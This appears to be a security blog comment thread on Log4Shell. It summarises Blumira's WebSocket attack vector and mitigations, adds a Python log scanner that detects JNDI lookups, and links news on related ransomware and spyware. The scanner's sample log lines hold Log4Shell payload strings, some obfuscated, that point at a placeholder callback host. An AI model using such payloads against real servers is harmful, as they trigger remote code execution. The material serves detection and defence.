This newly discovered JavaScript WebSocket attack vector can be exploited through the path of a listening server on their machine or local network. An attacker can simply navigate to a website and trigger the vulnerability. Adding insult to injury, WebSocket connections within the host can be difficult to gain deep visibility into. That means it’s even harder to detect this vulnerability and attacks using it.
This vector significantly expands the attack surface. How much so? It can be used on services running as localhost, which are not exposed to a network.
Oh, and did I mention? The client itself has no direct control over WebSocket connections. They can silently start when a webpage loads.
WebSockets have their own security risks. WebSockets aren’t restricted by same-origin policies like a normal cross-domain HTTP request. Instead, they expect the webserver to validate a request’s origin. In short, they don’t come with much in the way of built-in security measures.
In their proof-of-concept attack, Blumira found that by using one of the many Java Naming and Directory Interface (JNDI) exploits that they could trigger via a file path URL using a WebSocket connection to machines with an installed vulnerable Log4j2 library. All that was needed to trigger success was a path request that was started on the web page load. Simple, but deadly.
Making matters worse, it doesn’t need to be localhost. WebSockets allow for connections to any IP. Let me repeat, “Any IP” and that includes private IP space.
Next, as the page loads, it will initiate a local WebSocket connection, hit the vulnerable listening server, and connect out over the identified type of connection based on the JNDI connection string. The researchers saw the most success utilizing Java Remote Method Invocation (RMI), default port 1099.
Then, once an open port to a local service or a service accessible to the host is found, it can drop the JNDI exploit string in the path or parameters. “When this happens, the vulnerable host calls out to the exploit server, loads the attacker’s class, and executes it with java.exe as the parent process.” Then the attacker can run whatever he wants.
Indeed, they already are. As Anurag Gurtu, StrikeReady’s chief product officer, observed, “Apparently, a ransomware attack is currently exploiting the Log4Shell vulnerability.”
What can you do about this? Blumira suggests the following:
Update all local development efforts, internal applications, and internet-facing environments to Log4j 2.16 as soon as possible, before threat actors can weaponize this exploit further. This includes moving any custom applications in their dependency manifests to 2.16 as soon as possible to avoid incidental exploitation.
You should also look closely at your network firewall and egress filtering. The mission here is to restrict the callback required for the actual exploit to land. Significantly limiting the egress traffic of your endpoints will reduce the risk as you patch your applications. In particular, make sure that only certain machines can send out traffic over ports 53, 389, 636, and 1099. All other ports should be blocked.
Good luck, and get back to work hunting down Log4j libraries.
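As an added defensive example (not code from the ZDNet article or from Blumira), the Python scanner below looks for the JNDI lookup string in the request paths, parameters and headers recorded in web access logs, unfolding the URL-encoded and nested-lookup forms first so that a request does not have to contain a literal "jndi" to be flagged; the log lines are constructed and the IP addresses are documentation-range placeholders.

```python
"""Detect Log4Shell-style JNDI lookup strings in web access-log lines.

Added example, not from the article or Blumira. SAMPLE_LOG is constructed.
Log4j 2 evaluates nested lookups before the outer one, so the scanner
collapses the nesting and URL encoding it knows about before matching.
"""
import re
from urllib.parse import unquote

# Nested forms Log4j 2 resolves: ${lower:X} / ${upper:X} and the
# default-value form ${name:-X} (for example ${::-X} or ${env:UNSET:-X}).
_NESTED = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}")
# The outer lookup once unfolded: ${jndi:<scheme>...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 20) -> str:
    """Undo URL encoding and nested lookups until the text stops changing."""
    for _ in range(max_rounds):
        unfolded = _NESTED.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2),
            unquote(text),
        )
        if unfolded == text:
            break
        text = unfolded
    return text


def find_jndi(line: str):
    """Return the lower-cased JNDI scheme (ldap, rmi, dns, ...) or None."""
    match = _JNDI.search(normalize(line))
    return match.group(1).lower() if match else None


def scan_log(lines):
    """Return (1-based line number, scheme) for every line with a JNDI lookup."""
    hits = ((n, find_jndi(line)) for n, line in enumerate(lines, 1))
    return [(n, scheme) for n, scheme in hits if scheme]


SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '10.0.0.5 - - [17/Dec/2021:20:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [17/Dec/2021:20:00:02 +0000] "GET /login?user=${jndi:rmi://198.51.100.7:1099/a} HTTP/1.1" 200 88 "-" "curl/7.79"',
    '10.0.0.9 - - [17/Dec/2021:20:00:03 +0000] "GET / HTTP/1.1" 200 88 "-" "${${lower:j}ndi:ldap://198.51.100.7/x}"',
    '10.0.0.9 - - [17/Dec/2021:20:00:04 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 404 0 "-" "-"',
    '10.0.0.2 - - [17/Dec/2021:20:00:05 +0000] "GET /api?tpl=${date:yyyy} HTTP/1.1" 200 10 "-" "-"',
]

if __name__ == "__main__":
    for line_no, scheme in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: JNDI lookup via {scheme}")
```

A hit only tells you an attempt reached the logged component; whether it landed depends on the outbound connection the callback needs, which is exactly what the egress filtering above is meant to stop.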
Tomi Engdahl says:
Log4j: Major IT vendors rush out fixes for this flaw and more ahead of Christmas
IBM and Cisco release Log4j fixes as VMware patches critical non-Log4j flaw.
https://www.zdnet.com/article/vmware-patches-critical-non-log4j-flaw-as-ibm-cisco-release-log4j-fixes/
Tomi Engdahl says:
Log4j – What should boards be asking?
https://www.ncsc.gov.uk/blog-post/log4j-vulnerability-what-should-boards-be-asking
The Log4j issue has the potential to cause severe impact to many organisations. As cyber security experts attempt to detect which software and organisations are vulnerable, attackers start to exploit the vulnerability. Initial reports indicate this is likely to include remote control malware and ransomware. However, the situation is fluid and changing regularly.
Tomi Engdahl says:
Log4j – TellYouThePass ransomware revived in Linux, Windows Log4j attacks
https://www.bleepingcomputer.com/news/security/tellyouthepass-ransomware-revived-in-linux-windows-log4j-attacks/
Threat actors have revived an old and relatively inactive ransomware family known as TellYouThePass, deploying it in attacks against Windows and Linux devices targeting a critical remote code execution bug in the Apache Log4j library. KnownSec 404 Team’s Heige first reported these attacks on Twitter on Monday after observing that the ransomware was dropped on old Windows systems using exploits targeting the flaw tracked as CVE-2021-44228 and known as Log4Shell.
Tomi Engdahl says:
Log4j – CISA.GOV – EMERGENCY DIRECTIVE 22-02 Mitigate Apache Log4j vulnerability
https://www.cisa.gov/emergency-directive-22-02
CISA has determined that this vulnerability poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action. This determination is based on the current exploitation of this vulnerability by threat actors in the wild, the likelihood of further exploitation of the vulnerability, the prevalence of the affected software in the federal enterprise, and the high potential for a compromise of agency information systems.
Log4j – Ransomware Advisory: Log4Shell Exploitation for Initial Access & Lateral Movement https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement
A week after the Log4j2 vulnerability became public, AdvIntel discovered the most concerning trend – the exploitation of the new CVE by one of the most prolific organized ransomware groups – Conti.
Tomi Engdahl says:
Log4j – TellYouThePass ransomware via Log4Shell exploitation / Windows and Linux ransomware https://www.curatedintel.org/2021/12/tellyouthepass-ransomware-via-log4shell.html
The Log4j2 exploit Log4Shell is being used to deploy TellYouThePass ransomware, an old and inactive ransomware family; prior to this event, TellYouThePass ransomware had not been mentioned on Twitter since 2020-07-23. Research has been published in the Chinese-speaking community, but not in the English-speaking community until now.
Judging from threat reports, this threat appears to be prominently affecting Chinese victims. We would like to especially highlight that TellYouThePass does not operate as a RaaS (Ransomware-as-a-Service).
Tomi Engdahl says:
US federal agency compromised in suspected APT attack
https://therecord.media/us-federal-agency-compromised-in-suspected-apt-attack/
A sophisticated threat actor has gained access and has backdoored the internal network of a US federal government agency, antivirus maker Avast reported this week. The security firm did not name the agency in its report, but The Record understands that the target of the attack was the United States Commission on International Religious Freedom (USCIRF). According to its website, the USCIRF is tasked with monitoring the right to freedom of religion and belief abroad and then making policy recommendations to the President, Secretary of State, and US Congress.
Tomi Engdahl says:
This image looks very different on Apple devices, see for yourself
https://www.bleepingcomputer.com/news/technology/this-image-looks-very-different-on-apple-devices-see-for-yourself/
Take a good look at the image below and the device you are on. Now view it again on an Apple device. Conversely, if you are using an Apple device, view this page on an Android or Windows device.
See also: https://www.da.vidbuchanan.co.uk/widgets/pngdiff/
Tomi Engdahl says:
A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution
https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html
Earlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works.
Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we’ve ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.
Tomi Engdahl says:
All Log4j, logback bugs we know so far and why you MUST ditch 2.15 https://www.bleepingcomputer.com/news/security/all-log4j-logback-bugs-we-know-so-far-and-why-you-must-ditch-215/
Everyone’s heard of the critical log4j zero-day by now. Dubbed ‘Log4Shell,’ the vulnerability has already set the internet on fire.
Thus far, the log4j vulnerability, tracked as CVE-2021-44228, has been abused by all kinds of threat actors from state-backed hackers to ransomware gangs and others to inject Monero miners on vulnerable systems.
The Week in Ransomware – December 17th 2021 – Enter Log4j https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-17th-2021-enter-log4j/
A critical Apache Log4j vulnerability took the world by storm this week, and now it is being used by threat actors as part of their ransomware attacks.
Tomi Engdahl says:
Superior Plus, the number one propane distributor in Canada and number five distributor in the U.S., has reported a ransomware incident. It’s the second security incident involving a top company in the propane business in the last six months. https://www.forbes.com/sites/leemathews/2021/12/16/one-of-north-americas-largest-propane-distributors-reports-ransomware-attack/
Superior reported having discovered the breach on December 12. The company’s announcement does not mention when the attackers originally gained access to its systems.
Tomi Engdahl says:
Thousands of Industrial Systems Targeted With New ‘PseudoManuscrypt’ Spyware
https://www.securityweek.com/thousands-industrial-systems-targeted-new-pseudomanuscrypt-spyware
Tens of thousands of devices around the world, including many industrial control systems (ICS) and government computers, have been targeted in what appears to be an espionage campaign that involves a new piece of malware dubbed PseudoManuscrypt, Kaspersky revealed on Thursday.
The attacks targeted 35,000 devices in 195 countries between January and November 2021, including devices housed by high-profile organizations. Roughly seven percent of the targets were ICS, with the engineering and building automation sectors being most impacted. Attacks were also aimed at military industrial enterprises and research laboratories.
Nearly one-third of the non-ICS devices targeted in this campaign were located in Russia, India and Brazil. As for ICS, the highest percentage of targets was observed in India, Vietnam and Russia.
The malware can steal VPN credentials, log keystrokes, capture the content of the screen (both images and video), record sound captured by the microphone, and steal clipboard and OS event log data.
PseudoManuscrypt has been distributed using pirated software installer archives — including ones related to ICS software — likely delivered by a malware-as-a-service platform. In some cases, the malware was delivered by the Glupteba botnet.